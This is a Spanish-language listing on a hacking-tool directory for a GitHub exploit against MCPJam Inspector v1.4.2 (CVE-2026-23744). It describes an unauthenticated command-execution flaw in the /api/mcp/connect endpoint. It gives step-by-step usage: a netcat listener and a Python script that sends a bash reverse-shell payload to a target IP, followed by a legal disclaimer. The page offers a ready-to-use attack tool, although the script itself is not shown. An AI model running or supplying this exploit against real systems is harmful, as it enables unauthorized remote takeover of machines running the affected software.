Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-23744-RCE — Esta utilidad se creó durante una investigación relacionada con MCPJam v1.4.2. La aplicación expone un endpoint de API que acepta un objeto de configuración de servidor. Bajo ciertas condiciones, una validación insuficiente puede permitir la ejecución no deseada de comandos. | Kitploit
Herramientas/GitHubGitHub/alisster00/cve-2026-23744-rce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHubalisster00/cve-2026-23744-rce

CVE-2026-23744-RCE

Esta utilidad se creó durante una investigación relacionada con MCPJam v1.4.2. La aplicación expone un endpoint de API que acepta un objeto de configuración de servidor. Bajo ciertas condiciones, una validación insuficiente puede permitir la ejecución no deseada de comandos.

Ver Repositorio
11hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

MCPJam Inspector v1.4.2 - Explotación RCE

Descripción de la vulnerabilidad

MCPJam Inspector contiene una vulnerabilidad de Ejecución Remota de Código (RCE) no autenticada en el endpoint /api/mcp/connect. La vulnerabilidad permite a los atacantes ejecutar comandos arbitrarios enviando una carga útil maliciosa de configuración del servidor MCP.

El endpoint acepta una carga útil JSON con un objeto serverConfig que contiene un command y un array de args, los cuales se ejecutan directamente en el sistema sin una validación o saneamiento adecuados.

Versiones afectadas

  • MCPJam Inspector v1.4.2 y probablemente versiones anteriores

Uso

Requisitos previos

  • Python 3.6+
  • Biblioteca requests: pip install requests
  • netcat o socat como listener

Inicio rápido

Terminal 1 - Iniciar listener:

root@kitploit:~
nc -lvnp 4444

Terminal 2 - Ejecutar el exploit:

root@kitploit:~
python3 script.py <IP_OBJETIVO> -l <TU_IP> --lport 4444

Ejemplos

root@kitploit:~
# Por defecto (puerto 6274, puerto de callback 4444)
python3 script.py <IP_OBJETIVO> -l <TU_IP>

# Puerto MCPJam personalizado
python3 script.py <IP_OBJETIVO> -p 6274 -l <TU_IP>

# Puerto de listener personalizado
python3 script.py <IP_OBJETIVO> -l <TU_IP> --lport 5555

Cómo funciona

  1. El script verifica que MCPJam sea accesible en el objetivo
  2. Construye una carga útil maliciosa de servidor MCP con una reverse shell de bash
  3. Envía la carga útil al endpoint /api/mcp/connect
  4. MCPJam procesa el comando e inicia el callback de reverse shell
  5. El usuario recibe una shell interactiva en el listener

Aviso legal

⚠️ AVISO LEGAL:

Este exploit se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal. Los usuarios son los únicos responsables de:

  • Obtener la autorización adecuada antes de probar cualquier sistema
  • Cumplir con todas las leyes y regulaciones aplicables
  • Cualquier daño o consecuencia legal derivada del mal uso

El autor no asume ninguna responsabilidad por el mal uso o los daños causados por esta herramienta. Úselo bajo su propio riesgo.

Detalles técnicos

  • Endpoint vulnerable: /api/mcp/connect
  • Método: POST
  • Autenticación: No se requiere
  • Impacto: Ejecución Remota de Código no autenticada
Descargar herramienta